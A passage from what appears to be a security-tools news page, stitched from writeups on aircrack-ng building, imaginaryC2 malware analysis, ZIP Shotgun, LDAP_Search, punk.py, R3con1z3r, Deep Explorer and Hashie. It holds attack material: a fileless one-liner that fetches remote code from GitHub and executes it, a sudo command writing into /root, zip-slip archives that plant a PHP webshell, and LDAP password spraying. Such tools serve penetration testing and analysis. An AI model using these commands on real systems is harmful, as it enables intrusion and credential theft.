    pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka

    DragonflyBSD
    pkg install pkgconf shtool libtool gcc7 automake autoconf pcre sqlite3 libgcrypt gmake cmocka

    OpenBSD
    pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka

    OSX
    XCode, Xcode command line tools and HomeBrew are required.
    brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka

    Windows

    Cygwin
    Cygwin requires the full path to the setup.exe utility, in order to automate the installation of the necessary packages. In addition, it requires the location of your installation, a path to the cached packages download location, and a mirror URL.
    An example of automatically installing all the dependencies is as follows:
    c:\cygwin\setup-x86.exe -qnNdO -R C:/cygwin -s http://cygwin.mirror.constant.com -l C:/cygwin/var/cache/setup -P autoconf -P automake -P bison -P gcc-core -P gcc-g++ -P mingw-runtime -P mingw-binutils -P mingw-gcc-core -P mingw-gcc-g++ -P mingw-pthreads -P mingw-w32api -P libtool -P make -P python -P gettext-devel -P gettext -P intltool -P libiconv -P pkg-config -P git -P wget -P curl -P libpcre-devel -P openssl-devel -P libsqlite3-devel

    MSYS2
    pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel

    Compiling
    To build aircrack-ng, the Autotools build system is utilized. Autotools replaces the older method of compilation.
    NOTE: If utilizing a developer version, eg: one checked out from source control, you will need to run a pre-configure script. The script to use is one of the following: autoreconf -i or env NOCONFIGURE=1 ./autogen.sh.
    First, ./configure the project for building with the appropriate options specified for your environment:
    ./configure <options>
    TIP: If the above fails, please see above about developer source control versions.
    Next, compile the project (respecting if make or gmake is needed):
    • Compilation:
      make
    • Compilation on *BSD or Solaris:
      gmake
    Finally, the additional targets listed below may be of use in your environment:
    • Execute all unit testing:
      make check
    • Installing:
      make install
    • Uninstall:
      make uninstall

    ./configure flags
    When configuring, the following flags can be used and combined to adjust the suite to your choosing:
    • with-airpcap=DIR: needed for supporting Airpcap devices on Windows (Cygwin or MSYS2 only). Replace DIR above with the absolute location of the root of the extracted source code from the Airpcap CD or downloaded SDK available online. Required on Windows to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng when building experimental tools. The developer pack (compatible with versions 4.1.1 and 4.1.3) can be downloaded at https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html
    • with-experimental: needed to compile tkiptun-ng, easside-ng, buddy-ng, buddy-ng-crawler, airventriloquist and wesside-ng. libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See --with-airpcap option above.
    • with-ext-scripts: needed to build airoscript-ng, versuck-ng, airgraph-ng and airdrop-ng. Note: Each script has its own dependencies.
    • with-gcrypt: Use the libgcrypt crypto library instead of the default OpenSSL, and also use the internal fast SHA-1 implementation (borrowed from Git). Dependency (Debian): libgcrypt20-dev
    • with-duma: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (debian): duma
    • disable-libnl: Set-up the project to be compiled without libnl (1 or 3). Linux option only.
    • without-opt: Do not enable stack protector (on GCC 4.9 and above).
    • enable-shared: Make OSdep a shared library.
    • disable-shared: When combined with enable-static, it will statically compile Aircrack-ng.
    • with-avx512: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.
    • with-static-simd=: Compile a single optimization into the aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization into the binary; --with-static-simd merely allows you to choose another one.

    Examples:
    • Configure and compiling:
      ./configure --with-experimental
      make
    • Compiling with gcrypt:
      ./configure --with-gcrypt
      make
    • Installing:
      make install
    • Installing (strip binaries):
      make install-strip
    • Installing, with external scripts:
      ./configure --with-experimental --with-ext-scripts
      make
      make install
    • Testing (with sqlite, experimental and pcre)
      ./configure --with-experimental
      make
      make check
    • Compiling on OS X with macports (and all options):
      ./configure --with-experimental
      gmake
    • Compiling on OS X 10.10 with XCode 7.1 and Homebrew:
      env CC=gcc-4.9 CXX=g++-4.9 ./configure
      make
      make check
      NOTE: Older XCode ships with a version of LLVM that does not support CPU feature detection, which causes the ./configure to fail. To work around this older LLVM, it is required that a different compile suite is used, such as GCC or a newer LLVM from Homebrew.
      If you wish to use OpenSSL from Homebrew, you may need to specify the location of its installation. To figure out where OpenSSL lives, run:
      brew --prefix openssl
      Use the output above as the DIR for --with-openssl=DIR in the ./configure line:
      env CC=gcc-4.9 CXX=g++-4.9 ./configure --with-openssl=DIR
      make
      make check
    • Compiling on FreeBSD with gcc8
      env CC=gcc8 CXX=g++8 MAKE=gmake ./configure
      gmake
    • Compiling on Cygwin with Airpcap (assuming Airpcap devpack is unpacked in Aircrack-ng directory)
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-osdep
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-crypto
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-util
      dlltool -D Airpcap_Devpack/bin/x86/airpcap.dll -d build/airpcap.dll.def -l Airpcap_Devpack/bin/x86/libairpcap.dll.a
      autoreconf -i
      ./configure --with-experimental --with-airpcap=$(pwd)
      make
    • Compiling on DragonflyBSD with gcrypt using GCC 7
      autoreconf -i
      env CC=gcc7 CXX=g++7 MAKE=gmake ./configure --with-experimental --with-gcrypt
      gmake
    • Compiling on OpenBSD (with autoconf 2.69 and automake 1.16)
      export AUTOCONF_VERSION=2.69
      export AUTOMAKE_VERSION=1.16
      autoreconf -i
      env MAKE=gmake ./configure
      gmake

    Packaging
    Automatic detection of CPU optimization is done at run time. This behavior is desirable when packaging Aircrack-ng (for a Linux or other distribution).
    Also, in some cases it may be desired to provide your own flags completely and not have the suite auto-detect a number of optimizations. To do this, add the additional flag --without-opt to the ./configure line:
    ./configure --without-opt

    Using precompiled binaries

    Linux/BSD
    • Use your package manager to download aircrack-ng
    • In most cases, they have an old version.

    Windows
    • Install the appropriate "monitor" driver for your card (standard drivers don't work for capturing data).
    • The aircrack-ng suite consists of command line tools, so you have to open a command prompt (Start menu -> Run... -> cmd.exe) and use them from there.
    • Run the executables without any parameters to get help.

    Documentation
    Documentation, tutorials, ... can be found on https://aircrack-ng.org
    See also manpages and the forum.
    For further information check the README file


    imaginaryC2 - Tool Which Aims To Help In The Behavioral (Network) Analysis Of Malware


    author: Felix Weyne (website) (Twitter)

    Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware.
    Imaginary C2 hosts an HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.

    By using this tool, an analyst can feed the malware consistent network responses (e.g. C&C instructions for the malware to execute). Additionally, the analyst can capture and inspect HTTP requests towards a domain/IP which is off-line at the time of the analysis.

    Replay packet captures
    Imaginary C2 provides two scripts to convert packet captures (PCAPs) or Fiddler Session Archives into request definitions which can be parsed by imaginary C2. Via these scripts the user can extract HTTP request URLs and domains, as well as HTTP responses. This way, one can quickly replay HTTP responses for a given HTTP request.

    Technical details
    requirements: Imaginary C2 requires Python 2.7 and Windows.
    modules: Currently, Imaginary C2 contains three modules and two configuration files:
    Filename - Function
    1. imaginary_c2.py - Hosts python's simple HTTP server. Main module.
    2. redirect_to_imaginary_c2.py - Alters Windows' hosts file and Windows' (IP) routing table.
    3. unpack_fiddler_archive.py & unpack_pcap.py - Extracts HTTP responses from packet captures. Adds the corresponding HTTP request domains and URLs to the configuration files.
    4. redirect_config.txt - Contains domains and IPs which need to be redirected to localhost (to the python HTTP server).
    5. requests_config.txt - Contains URL path definitions with the corresponding data sources.
    request definitions: Each (HTTP) request defined in the request configuration consists of two parameters:
    Parameter 1: HTTP request URL path (a.k.a. urlType)
    Value - Meaning
    fixed - Define the URL path as a literal string
    regex - Define a regex pattern to be matched on the URL path
    Parameter 2: HTTP response source (a.k.a. sourceType)
    Value - Meaning
    data - Imaginary C2 will respond with the contents of a file on disk
    python - Imaginary C2 will run a python script. The output of the python script defines the HTTP response.
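    A condensed sketch of how such a definition could be dispatched (illustrative Python only; the real requests_config.txt syntax and the handler in imaginary_c2.py differ):

    # Illustrative urlType/sourceType dispatch, not imaginary C2's actual code.
    import re, subprocess

    def build_response(url_path, definition):
        url_type, pattern, source_type, source = definition
        if url_type == 'fixed':
            matched = (url_path == pattern)
        else:                                    # 'regex'
            matched = re.search(pattern, url_path) is not None
        if not matched:
            return None
        if source_type == 'data':                # respond with file contents
            with open(source, 'rb') as f:
                return f.read()
        return subprocess.check_output(['python', source])  # script output is the response

    # e.g. build_response('/gate.php', ('regex', r'gate\.php$', 'data', 'response.bin'))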

    Demo use case: Simulating TrickBot servers
    Imaginary C2 can be used to simulate the hosting of TrickBot components and configuration files. Additionally, it can also be used to simulate TrickBot's web injection servers.

    How it works:
    Upon execution, the TrickBot downloader connects to a set of hardcoded IPs to fetch a few configuration files. One of these configuration files contains the locations (IP addresses) of the TrickBot plugin servers. The Trickbot downloader downloads the plugins (modules) from these servers and decrypts them. The decrypted modules are then injected into a svchost.exe instance.


    One of TrickBot's plugins is called injectdll, a plugin which is responsible for TrickBot's webinjects. The injectdll plugin regularly fetches an updated set of webinject configurations. For each targeted (banking) website in the configuration, the address of a webfake server is defined. When a victim browses to a (banking) website which is targeted by TrickBot, his browser secretly gets redirected to the webfake server. The webfake server hosts a replica of the targeted website. This replica website usually is used in a social-engineering attack to defraud the victim.

    Imaginary C2 in action:
    The below video shows the TrickBot downloader running inside svchost.exe and connecting to imaginary C2 to download two modules. Each downloaded module gets injected into a newly spawned svchost.exe instance. The webinject module tries to steal the browser's saved passwords and exfiltrates the stolen passwords to the TrickBot server. Upon visiting a targeted banking website, TrickBot redirects the browser to the webfake server. In the demo, the webfake server hosts the message: "Default imaginary C2 server response" (full video).



    ZIP Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities


    Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post on Silent Signal Techblog - Compressed File Upload And Command Execution and from OWASP - Test Upload of Malicious Files
    This script will create an archive which contains files with "../" in their filenames. When extracted, this could cause files to be written to parent directories. It can allow an attacker to extract shells to directories which can be accessed from a web browser.
    Default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available HERE
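    The core trick is easy to picture with Python's standard zipfile module (a minimal sketch, assuming a local shell.php payload; ZIP Shotgun adds permission handling, random names and more on top):

    # Minimal zip-slip archive: entry names contain "../", so a naive extractor
    # may write the shell outside the intended directory.
    import zipfile

    with open('shell.php', 'rb') as f:
        payload = f.read()

    with zipfile.ZipFile('archive.zip', 'w') as zf:
        for depth in range(3):   # shell.php, ../shell.php, ../../shell.php
            zf.writestr('../' * depth + 'shell.php', payload)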

    Installation
    1. Install using Python pip
      pip install zip-shotgun --upgrade
    2. Clone git repository and install
      git clone https://github.com/jpiechowka/zip-shotgun.git
      Execute from root directory of the cloned repository (where setup.py file is located)
      pip install . --upgrade

    Usage and options
    Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

    Options:
    --version Show the version and exit.
    -c, --directories-count INTEGER
    Count of how many directories to go back
    inside the zip file (e.g 3 means that 3
    files will be added to the zip: shell.php,
    ../shell.php and ../../shell.php where
    shell.php is the name of the shell you
    provided or randomly generated value
    [default: 16]
    -n, --shell-name TEXT Name of the shell inside the generated zip
    file (e.g shell). If not provided it will be
    randomly generated. Cannot have whitespaces
    -f, --shell-file-path PATH A file that contains code for the shell. If
    this option is not provided wwwolf
    (https://github.com/WhiteWinterWolf/wwwolf-
    php-webshell) php shell will be added
    instead. If name is provided it will be
    added to the zip with the provided name or
    if not provided the name will be randomly
    generated.
    --compress Enable compression. If this flag is set
    archive will be compressed using DEFLATE
    algorithm with compression level of 9. By
    default there is no compression applied.
    -h, --help Show this message and exit.

    Examples
    1. Using all default options
      zip-shotgun archive.zip
      Part of the script output
      12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
      12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
      ...
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
    2. Using default options and enabling compression for archive file
      zip-shotgun --compress archive.zip
      Part of the script output
      12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
      12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
      ...
      12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
    3. Using default options but changing the number of directories to go back in the archive to 3
      zip-shotgun --directories-count 3 archive.zip
      zip-shotgun -c 3 archive.zip
      The script will write 3 files in total to the archive
      Part of the script output
      12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
      12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
    4. Using default options but providing shell name inside archive and enabling compression
      Shell name cannot have whitespaces
      zip-shotgun --shell-name custom-name --compress archive.zip
      zip-shotgun -n custom-name --compress archive.zip
      Name for shell files inside the archive will be set to the one provided by the user.
      Part of the script output
      12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php
      ...
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL
    5. Provide custom shell file but use random name inside archive. Set directories count to 3
      zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
      zip-shotgun -c 3 -f ./custom-shell.php archive.zip
      Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.
      Part of the script output
      12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
    6. Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression
      zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
      zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
      Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.
      Part of the script output
      12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL


    LDAP_Search - Tool To Perform LDAP Queries And Enumerate Users, Groups, And Computers From Windows Domains


    LDAP_Search can be used to enumerate Users, Groups, and Computers on a Windows Domain. Authentication can be performed using a traditional username and password, or an NTLM hash. In addition, this tool has been modified to allow brute force/password-spraying via LDAP. Ldap_Search makes use of Impacket's python36 branch to perform the main operations. (These are the guys that did the real heavy lifting and deserve the credit!)

    Installation
    git clone --recursive https://github.com/m8r0wn/ldap_search
    cd ldap_search
    sudo chmod +x setup.sh
    sudo ./setup.sh

    Usage
    Enumerate all active users on a domain:
    python3 ldap_search.py users -u user1 -p Password1 -d demo.local
    Lookup a single user and display field headings:
    python3 ldap_search.py users -q AdminUser -u user1 -p Password1 -d demo.local
    Enumerate all computers on a domain:
    python3 ldap_search.py computers -u user1 -p Password1 -d demo.local
    Search for end of life systems on the domain:
    python3 ldap_search.py computers -q eol -u user1 -p Password1 -d demo.local -s DC01.demo.local
    Enumerate all groups on the domain:
    python3 ldap_search.py groups -u user1 -p Password1 -d demo.local -s 192.168.1.1
    Query group members:
    python3 ldap_search.py groups -q "Domain Admins" -u user1 -p Password1 -d demo.local

    Queries
    Below are the query options that can be specified using the "-q" argument:
    User
    active / [None] - All active users (Default)
    all - All users, even disabled
    [specific account or email] - lookup user, ex. "m8r0wn"

    group
    [None] - All domain groups
    [Specific group name] - lookup group members, ex. "Domain Admins"

    computer
    [None] - All Domain Computers
    eol - look for all end of life systems on domain
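    For reference, the "active" user query above maps naturally onto an LDAP filter that excludes the ACCOUNTDISABLE bit. A hedged sketch with the ldap3 library (illustrative only; ldap_search itself builds on Impacket, and the server and credentials below are made up):

    # Illustrative "all active users" LDAP query using ldap3. The matching-rule
    # OID 1.2.840.113556.1.4.803 tests userAccountControl bits; bit 2 = disabled.
    from ldap3 import Server, Connection, ALL

    server = Server('DC01.demo.local', get_info=ALL)
    conn = Connection(server, user='demo\\user1', password='Password1', auto_bind=True)
    conn.search('dc=demo,dc=local',
                '(&(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))',
                attributes=['sAMAccountName'])
    for entry in conn.entries:
        print(entry.sAMAccountName)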

    Options
    positional arguments:
    lookup_type Lookup Types: user, group, computer

    optional arguments:
    -q QUERY Specify user or group to query or use eol.
    -u USER Single username
    -U USER Users.txt file
    -p PASSWD Single password
    -P PASSWD Password.txt file
    -H HASH Use Hash for Authentication
    -d DOMAIN Domain (Ex. demo.local)
    -s SRV, -srv SRV LDAP Server (optional)
    -t TIMEOUT Connection Timeout (Default: 4)
    -v Show Search Result Attribute Names
    -vv Show Failed Logins & Errors


    Punk.Py - Unix SSH Post-Exploitation Tool


    Unix SSH post-exploitation 1337 tool

    how it works
    punk.py is a post-exploitation tool meant to help with network pivoting from a compromised unix box. It collects usernames, SSH keys and known hosts from a unix system, then tries to connect via SSH to all the combinations found. punk.py is written to work on standard python2 installations.
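    The core idea is a triple loop over the harvested users, keys and hosts; a rough sketch (illustrative only, shelling out to the system ssh client; punk.py's own collection and connection logic differs):

    # Try every harvested key against every harvested user@host combination.
    import subprocess

    def try_ssh(user, key_path, host):
        cmd = ['ssh', '-i', key_path, '-o', 'BatchMode=yes',
               '-o', 'StrictHostKeyChecking=no', '-o', 'ConnectTimeout=5',
               '%s@%s' % (user, host), 'true']
        return subprocess.call(cmd) == 0   # exit code 0 -> key accepted

    for user in ['root', 'admin']:                 # harvested usernames
        for key in ['/home/admin/.ssh/id_rsa']:    # harvested private keys
            for host in ['10.0.0.5']:              # hosts from known_hosts
                if try_ssh(user, key, host):
                    print('[+] %s@%s with %s' % (user, host, key))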

    examples
    standard execution:
     ~$ ./punk.py
    skip passwd checks and use a custom home path:
     ~$ ./punk.py --no-passwd --home /home/ldapusers/
    execute commands with sudo:
     ~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
    one-liner fileless ( with --no-passwd parameter ):
     ~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

    TODO


    R3Con1Z3R - A Lightweight Web Information Gathering Tool With An Intuitive Features (OSINT)


    R3con1z3r is a lightweight web information gathering tool with intuitive features, written in python. It provides a powerful environment in which open source intelligence (OSINT) web-based footprinting can be conducted quickly and thoroughly.
    Footprinting is the first phase of ethical hacking; it is the collection of every possible piece of information regarding the target. R3con1z3r is a passive reconnaissance tool with built-in functionalities which include: HTTP header flag, Traceroute, Whois Footprinting, DNS information, Site on same server, Nmap port scanner, Reverse Target and hyperlinks on a webpage. The tool, after being provided with the necessary inputs, generates an output in HTML format.

    Screenshots



    Installation
    r3con1z3r supports Python 2 and Python 3.
    $ git clone https://github.com/abdulgaphy/r3con1z3r.git
    $ cd r3con1z3r
    $ pip install -r requirements.txt
    Optional for Linux users
    $ sudo chmod +x r3con1z3r.py

    Modules
    r3con1z3r depends only on the sys and requests python modules.
    Python 3: $ pip3 install -r requirements.txt
    For coloring on Windows: pip install win_unicode_console colorama

    Usage
    python3 r3con1z3r.py [domain.com]

    Examples
    • To run on all operating systems (Linux, Windows, Mac OS X, Android, etc.), i.e. in a Python 2 environment:
    python r3con1z3r.py google.com
    • To run in a Python 3 environment:
    python3 r3con1z3r.py facebook.com
    • To run as an executable (Unix only):
    ./r3con1z3r.py google.com



    Deep Explorer - Tool Which Purpose Is The Search Of Hidden Services In Tor Network, Using Ahmia Browser And Crawling The Links Obtained


    Dependencies
     pip3 install -r requirements.txt
    You should also have Tor installed.

    Usage
    python3 deepexplorer.py STRING_TO_SEARCH NUMBER_OF_RESULTS TYPE_OF_CRAWL
    Examples:
    python3 deepexplorer.py "legal thing" 40 default legal (will crawl if the results obtained in the browser do not reach 40; the script will also show links which have the "legal" string in their html [like the intext dork in google])
    python3 deepexplorer.py "ilegal thing" 30 all dni (will crawl every link obtained in the browser [until it reaches 30]; the script will also show links which have the "dni" string in their html [like the intext dork in google])
    python3 deepexplorer.py "legal thing" 30 none (do not crawl, only obtain links from the browser)
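    Under the hood, reaching .onion links requires routing requests through the local Tor SOCKS proxy; a minimal sketch of that part (assuming Tor listens on the default 127.0.0.1:9050 and the requests[socks] extra is installed; the onion address is a placeholder):

    # Fetch a hidden service through Tor's SOCKS proxy (illustrative only).
    import requests

    proxies = {'http': 'socks5h://127.0.0.1:9050',
               'https': 'socks5h://127.0.0.1:9050'}
    r = requests.get('http://exampleonionaddress.onion', proxies=proxies, timeout=30)
    print(r.status_code)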

    About
    Deep Explorer is a tool designed to search (any)thing in a few seconds
    Any ideas, failures, etc., please report via telegram: blueudp
    results.txt contains the results obtained in the previous search
    Tested on ParrotOS and Kali Linux 2.0

    Type of Errors
    • Error importing... -> You should try a manual pip install of the package
    • Error connecting to server -> Can't connect to the ahmia browser. If deep explorer can not execute service ..., do it manually; deep explorer checks the tor instance at the beginning, so it will skip that part

    Contact
    Name: Eduardo Pérez-Malumbres
    Telegram: @blueudp
    Twitter: https://twitter.com/blueudp


    Hashie - Crack Hashes In A Blink Of An Eye


    Hashie is a multi-functional tool written in python to deal with hashes.

    Features
    • Hash cracking.
    • Hash generation.
    • Automatic hash type identification (sketched below).
    • Supports MD5, SHA1, SHA256, SHA384, SHA512 etc...
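    Automatic type identification for unsalted hashes is typically length-based; a minimal sketch of that idea (illustrative only, not Hashie's exact logic):

    # Guess a hash type from digest length, the usual heuristic for unsalted hashes.
    HASH_LENGTHS = {32: 'MD5', 40: 'SHA1', 64: 'SHA256', 96: 'SHA384', 128: 'SHA512'}

    def identify(hash_string):
        return HASH_LENGTHS.get(len(hash_string.strip()), 'Unknown')

    print(identify('5f4dcc3b5aa765d61d8327deb882cf99'))   # -> MD5 (of 'password')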

    How to Install and Run in Linux
    [1] Enter the following command in the terminal to download it.
    git clone https://github.com/Sameera-Madhushan/Hashie
    [2] After downloading the program, enter the following command to navigate to the Hashie directory and list the contents
    cd Hashie && ls
    [3] Install dependencies
    pip3 install -r requirements.txt
    [4] Now run the script with following command.
    python3 hashie.py

    How to Install and Run in Windows
    [1] Download and run the Python 3.7 setup file from Python.org
    • When installing Python 3.7, enable Add Python 3.7 to PATH
    [2] Download and run the Git setup file from Git-scm.com, choosing Use Git from the Windows Command Prompt.
    [3] After that, run Command Prompt and enter these commands:
    git clone https://github.com/Sameera-Madhushan/Hashie
    cd Hashie
    pip3 install -r requirements.txt
    python3 hashie.py


    pyHAWK - Searches The Directory Of Choice For Interesting Files. Such As Database Files And Files With Passwords Stored On Them


